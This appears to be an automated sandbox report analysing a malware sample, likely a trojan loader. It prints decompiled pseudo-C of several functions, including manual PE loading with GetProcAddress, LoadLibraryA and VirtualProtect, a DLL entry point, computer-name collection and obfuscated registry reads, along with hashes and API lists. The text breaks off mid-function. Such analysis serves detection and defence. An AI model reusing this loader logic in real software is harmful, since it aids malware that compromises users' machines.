0x02c8635e
0x02c8636b
0x02c8636b
0x02c86370
0x00000000
0x02c86370
0x02c862eb
0x02c862f0
0x02c862fe
0x02c86302
0x02c86325
0x02c86304
0x02c8631a
0x02c8631c
0x02c8631c
0x02c86328
0x00000000
0x00000000
0x00000000
0x00000000
0x02c86328
0x02c862dc

APIs

memset.NTDLL ref: 02C86224

Part of subcall function 02C8662A: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,02C8624A,00410025,00000005,?,00000000), ref: 02C8663B
Part of subcall function 02C8662A: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02C86658

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02C86258
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02C86263

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: e258280a0bebe9405babe491e5eff5369f5e3be656e8108c8a962251923eb78b
Instruction ID: cec21fd51e2e2d8ea021debd57e2f8875909419da1c1704d44f2795f9d60ae8b
Opcode Fuzzy Hash: e258280a0bebe9405babe491e5eff5369f5e3be656e8108c8a962251923eb78b
Instruction Fuzzy Hash: FD415E72900219AFDB11BFE4DC84EDE7BBDAF09348B50C526EA06E7100D7719E459B91

Uniqueness

Uniqueness Score: -1.00%

Function 02C859F9, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02C859F9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02C8907D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2c8d2a4; // 0x245a5a8
						_t20 = _t68 + 0x2c8e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02C8666E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02c859ff
0x02c85a02
0x02c85a12
0x02c85a1b
0x02c85a1f
0x02c85aed
0x02c85af3
0x02c85af3
0x02c85a39
0x02c85a3e
0x02c85a42
0x02c85a48
0x02c85a4d
0x02c85a54
0x02c85a63
0x02c85a63
0x02c85a67
0x02c85a69
0x02c85a75
0x02c85a80
0x02c85a8b
0x02c85a8f
0x02c85a99
0x02c85a9d
0x02c85a9f
0x02c85aa4
0x02c85aab
0x02c85abb
0x02c85abb
0x02c85aa4
0x02c85a9d
0x02c85abd
0x02c85ac2
0x02c85ac7
0x02c85ac7
0x02c85aca
0x02c85ad3
0x02c85ad8
0x02c85ad8
0x02c85add
0x02c85ae2
0x02c85ae2
0x02c85add
0x02c85a67
0x02c85ae4
0x02c85aea
0x00000000

APIs

Part of subcall function 02C8907D: SysAllocString.OLEAUT32(80000002), ref: 02C890DA
Part of subcall function 02C8907D: SysFreeString.OLEAUT32(00000000), ref: 02C89140

SysFreeString.OLEAUT32(?), ref: 02C85AD8
SysFreeString.OLEAUT32(02C84010), ref: 02C85AE2

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: cfd7d5dd59ae8e09b0e2792fb34ab0c333417ac280cf58eb5bc11fdadaf5f16c
Instruction ID: 94e3bd19e4f4f5da76b13a05a09469593178bc5d62627f7409a414eba28b7354
Opcode Fuzzy Hash: cfd7d5dd59ae8e09b0e2792fb34ab0c333417ac280cf58eb5bc11fdadaf5f16c
Instruction Fuzzy Hash: D2316B31900108AFCB11EF64C8C8CEBBB7AFBC97887158658F8159B210E372DD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D481424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D481424() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6d484144;
				if( *0x6d48412c > 5) {
					_t16 = _t15 + 0x6d4850f9;
				} else {
					_t16 = _t15 + 0x6d4850b1;
				}
				E6D4810BC(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6D481A26( &_v32,  &_v16,  *0x6d484140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6d484138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6D481352(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6d484138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6D482032(_t44, _t32 + 4);
						}
					}
					_t25 = E6D481699(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6d48142a
0x6d48143b
0x6d481445
0x6d48143d
0x6d48143d
0x6d48143d
0x6d48144c
0x6d481455
0x6d48145a
0x6d481478
0x6d4814d4
0x6d48147a
0x6d481480
0x6d481486
0x6d481494
0x6d481498
0x6d48149f
0x6d4814a8
0x6d4814ac
0x6d4814b2
0x6d4814c3
0x6d4814b4
0x6d4814ba
0x6d4814ba
0x6d4814b2
0x6d4814cb
0x6d4814cb
0x6d4814d6

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6D481480
ExitThread.KERNEL32 ref: 6D4814D6

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 98ba44baa35973b79864fb9e40b4a05e5abf40a4a7c9f89bb9e9660b06bcf67a
Instruction ID: ca2cca21d5b829ed2f176fc8d4ab77254edaa774fa0105c11507724316ce651d
Opcode Fuzzy Hash: 98ba44baa35973b79864fb9e40b4a05e5abf40a4a7c9f89bb9e9660b06bcf67a
Instruction Fuzzy Hash: 7711D0711082859BDB11EB64C848F9777FDAB0B7C6F11491BF169E7196EB30EC048B92

Uniqueness

Uniqueness Score: -1.00%

Function 02C8450C, Relevance: 3.1, APIs: 2, Instructions: 51
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C8450C(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02C81546(0, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E02C868D2(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02C84413(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2c8d238, 0, _t25);
				}
				return _t22;
			}

0x02c8450c
0x02c8451f
0x02c84523
0x02c8457e
0x02c84525
0x02c8452c
0x02c84534
0x02c84537
0x02c8453c
0x02c84540
0x02c84546
0x02c8454e
0x02c84551
0x02c84569
0x02c84569
0x02c84574
0x02c84574
0x02c84585

APIs

Part of subcall function 02C81546: lstrlen.KERNEL32(?,00000000,02C8D330,00000001,02C867F7,02C8D00C,02C8D00C,00000000,00000005,00000000,00000000,?,?,?,02C841AA,02C85D90), ref: 02C8154F
Part of subcall function 02C81546: mbstowcs.NTDLL ref: 02C81576
Part of subcall function 02C81546: memset.NTDLL ref: 02C81588

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,050E937C), ref: 02C84546
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,050E937C), ref: 02C84574

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: fb99a6be8d15cdd64886155b563f4f245bdfde2672a2c9f88127dfca7d25ff5c
Instruction ID: 3d56a4ff2e2679b283dfc07cf028fbe0fcf826e814da64015a378fe7d4e97a4e
Opcode Fuzzy Hash: fb99a6be8d15cdd64886155b563f4f245bdfde2672a2c9f88127dfca7d25ff5c
Instruction Fuzzy Hash: 8601D83160020ABBDB216FA4DC44F9F7BB9EF88758F108426FA049B050D771C924DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02C83F0E, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02C83F0E(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02C87E20(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02C8A5FA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02c83f13
0x02c83f1e
0x02c83f20
0x02c83f26
0x02c83f28
0x02c83f2d
0x02c83f36
0x02c83f3a
0x02c83f43
0x02c83f47
0x02c83f56
0x02c83f49
0x02c83f4a
0x02c83f4f
0x02c83f4f
0x02c83f47
0x02c83f3a
0x02c83f5f

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02C829CE,73BCF710,00000000,?,?,02C829CE), ref: 02C83F26

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

GetComputerNameExA.KERNELBASE(00000003,00000000,02C829CE,02C829CF,?,?,02C829CE), ref: 02C83F43

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 75ee504701b03a8fe35900f42647f00f6740452bbee01d9a4f26b1a195a66207
Instruction ID: 283bef4f69ef489ae30bb3d2255919a632a9b720d7ae3d1f203f0d7e394f4563
Opcode Fuzzy Hash: 75ee504701b03a8fe35900f42647f00f6740452bbee01d9a4f26b1a195a66207
Instruction Fuzzy Hash: 0AF0B436600146BAEB11E69A9C00FAF7BFDDBC4B48F1040DAE908D7140EB70DF0196B0

Uniqueness

Uniqueness Score: -1.00%

Function 02C86456, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2c8d23c) == 0) {
						E02C8469F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2c8d23c) == 1) {
						_t10 = E02C8523A(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02c8645d
0x02c8645e
0x02c86461
0x02c86493
0x02c86495
0x02c86495
0x02c86463
0x02c86464
0x02c86479
0x02c86480
0x02c86482
0x02c86482
0x02c86480
0x02c86464
0x02c8649d

APIs

InterlockedIncrement.KERNEL32(02C8D23C), ref: 02C8646B

Part of subcall function 02C8523A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02C8647E,?), ref: 02C8524D

InterlockedDecrement.KERNEL32(02C8D23C), ref: 02C8648B

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: f212ce676f5cd8b516357488b690661bc57ff49219f5adc0785212b59b5e4c5b
Instruction ID: 98430a0f7323e86856a71e72bd5e80c026294bef28f17d398b106ad370e1e50e
Opcode Fuzzy Hash: f212ce676f5cd8b516357488b690661bc57ff49219f5adc0785212b59b5e4c5b
Instruction Fuzzy Hash: 16E04F212C422163A729B6749C04B5EA749ABD17CDF21C925E487D2078C790F99097A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7FA0, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,6D50B428,0000311C,00000040,6D509B0C), ref: 6D4B8058

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: eef6b1005a04298ed848de532f2811f9f11fbef91e0681cd9eeef86679110bd4
Instruction ID: 487a36b532bfdd427ee68ed0d787f05b36295dbfacdcc496692e6681478fb3e4
Opcode Fuzzy Hash: eef6b1005a04298ed848de532f2811f9f11fbef91e0681cd9eeef86679110bd4
Instruction Fuzzy Hash: BF81ADB0501101AFCB18EF29E998B25BBB1EBCA308704811BD6498736DD734ED64CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 02C8497C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02C8497C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2c8d2a4; // 0x245a5a8
				_t4 = _t15 + 0x2c8e39c; // 0x50e8944
				_t20 = _t4;
				_t6 = _t15 + 0x2c8e124; // 0x650047
				_t17 = E02C859F9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02C87E65(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02c84986
0x02c8498d
0x02c8498e
0x02c8498f
0x02c84990
0x02c84996
0x02c8499b
0x02c8499b
0x02c849a5
0x02c849b7
0x02c849be
0x02c849ec
0x02c849c0
0x02c849c2
0x02c849c7
0x02c849e9
0x02c849c9
0x02c849cc
0x02c849d3
0x02c849d8
0x02c849da
0x02c849da
0x02c849df
0x02c849df
0x02c849c7
0x02c849f3

APIs

Part of subcall function 02C859F9: SysFreeString.OLEAUT32(?), ref: 02C85AD8

Part of subcall function 02C87E65: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02C81459,004F0053,00000000,?), ref: 02C87E6E
Part of subcall function 02C87E65: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02C81459,004F0053,00000000,?), ref: 02C87E98
Part of subcall function 02C87E65: memset.NTDLL ref: 02C87EAC

SysFreeString.OLEAUT32(00000000), ref: 02C849DF

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: b32f821ebbc1ea8e40de47abfd2f0a073fd5751d7de9ef49c17e000a32742c1c
Instruction ID: 909b2554b9cb4987d70ebd76eee361f9a2222ea1ed38659731fc1caecfd00265
Opcode Fuzzy Hash: b32f821ebbc1ea8e40de47abfd2f0a073fd5751d7de9ef49c17e000a32742c1c
Instruction Fuzzy Hash: 2A01753650011ABFDF25AFA8CC01EAABBBDFB04354F018565F945E7160E3709E11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1BB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6D4C173D,?), ref: 6D4C1BC6

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fb086f731d6cb7e28a8210056469427ca31798db54b318ede1e4257a0936c9fc
Instruction ID: 6a9c0fe6a87f4b6d2a388227e78dbbbf188d0283ad96b214e1b15cc7f6e83bca
Opcode Fuzzy Hash: fb086f731d6cb7e28a8210056469427ca31798db54b318ede1e4257a0936c9fc
Instruction Fuzzy Hash: 33D0A73A954345AEDF006E715C08B763BFCD3867A9F10443AF90CC6540F770C980C900

Uniqueness

Uniqueness Score: -1.00%

Function 6D4810BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6D4810BC(void* __eax, intOrPtr _a4) {

				 *0x6d484150 =  *0x6d484150 & 0x00000000;
				_push(0);
				_push(0x6d48414c);
				_push(1);
				_push(_a4);
				 *0x6d484148 = 0xc; // executed
				L6D4810E2(); // executed
				return __eax;
			}

0x6d4810bc
0x6d4810c3
0x6d4810c5
0x6d4810ca
0x6d4810cc
0x6d4810d0
0x6d4810da
0x6d4810df

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6D481451,00000001,6D48414C,00000000), ref: 6D4810DA

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 6d4eafc45ca203fac57302a94db5374d15571319eee4a383aae46378d3152b05
Instruction ID: 5a18ea6d18e24826d154ea479844ae83a5f725ba0ecbb7b915c0526021a13006
Opcode Fuzzy Hash: 6d4eafc45ca203fac57302a94db5374d15571319eee4a383aae46378d3152b05
Instruction Fuzzy Hash: E3C04C74144380A6EA20AF808C4DF567A67776B7C7F22450DF618255C2D3B5D8548615

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C30B2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6D4C30B4

Part of subcall function 6D4C3040: RtlEncodePointer.NTDLL(00000000,?,6D4C30B9,00000000,6D4C6D8F,6D50B748,00000000,00000314,?,6D4C2D8E,6D50B748,6D4EF8D0,00012010), ref: 6D4C30A7

Memory Dump Source

Source File: 00000003.00000002.911348771.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction ID: 4ef27ef414bc5da98cb46c8f216cdc732e791d1c7e4a183397fc50976256fa2f
Opcode Fuzzy Hash: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6D481699, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6D481699(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6d484140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d484140 - 0x63698bc4 &  !( *0x6d484140 - 0x63698bc4);
				_t18 = E6D48150D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d484140 - 0x63698bc4 &  !( *0x6d484140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d484140 - 0x63698bc4 &  !( *0x6d484140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6D481000(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E6D4817FA(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E6D481E32(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6D48133D(_t42);
					L8:
					return _t29;
				}
			}

0x6d4816a1
0x6d4816a3
0x6d4816bf
0x6d4816d0
0x6d4816d7
0x6d481735
0x00000000
0x6d4816d9
0x6d4816d9
0x6d4816e3
0x6d4816e7
0x6d4816ec
0x6d4816f4
0x6d4816f8
0x6d4816fd
0x6d481702
0x6d481706
0x6d48170b
0x6d48170c
0x6d481710
0x6d481715
0x6d48171d
0x6d48171d
0x6d481715
0x6d481706
0x6d4816f8
0x6d48171f
0x6d481728
0x6d48172c
0x6d481736
0x6d48173c
0x6d48173c

APIs

Part of subcall function 6D48150D: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D4816D5,?,?,?,?,?,00000002,?,?), ref: 6D481531
Part of subcall function 6D48150D: GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481553
Part of subcall function 6D48150D: GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481569
Part of subcall function 6D48150D: GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D48157F
Part of subcall function 6D48150D: GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D481595
Part of subcall function 6D48150D: GetProcAddress.KERNEL32(00000000,?,?,?,?,6D4816D5,?,?,?,?,?,00000002), ref: 6D4815AB

Part of subcall function 6D481000: memcpy.NTDLL(00000002,?,6D4816E3,?,?,?,?,?,6D4816E3,?,?,?,?,?,?,?), ref: 6D481037
Part of subcall function 6D481000: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 6D48106C

Part of subcall function 6D4817FA: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D481832

Part of subcall function 6D481E32: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6D481E6B
Part of subcall function 6D481E32: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D481EE0
Part of subcall function 6D481E32: GetLastError.KERNEL32 ref: 6D481EE6

GetLastError.KERNEL32(?,?), ref: 6D481717

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 8ae75d1d30886413610a2395379028be6fcf1fa669a808f987ea93678ed16748
Instruction ID: 55a51c303519eba04d63d1bda13e6a9565ed0ec4a0ad2a5afb8b3a2cc3203294
Opcode Fuzzy Hash: 8ae75d1d30886413610a2395379028be6fcf1fa669a808f987ea93678ed16748
Instruction Fuzzy Hash: B4117136A003026BCB10EBACCC80D9B77BDBF59288714002EEB12D7602D7B0ED0687E0

Uniqueness

Uniqueness Score: -1.00%

Function 02C867C4, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02C867C4(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x2c8d330;
				E02C89186();
				while(1) {
					_t8 = E02C84C3B(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E02C81546(_t14);
					if(_t15 == 0) {
						HeapFree( *0x2c8d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
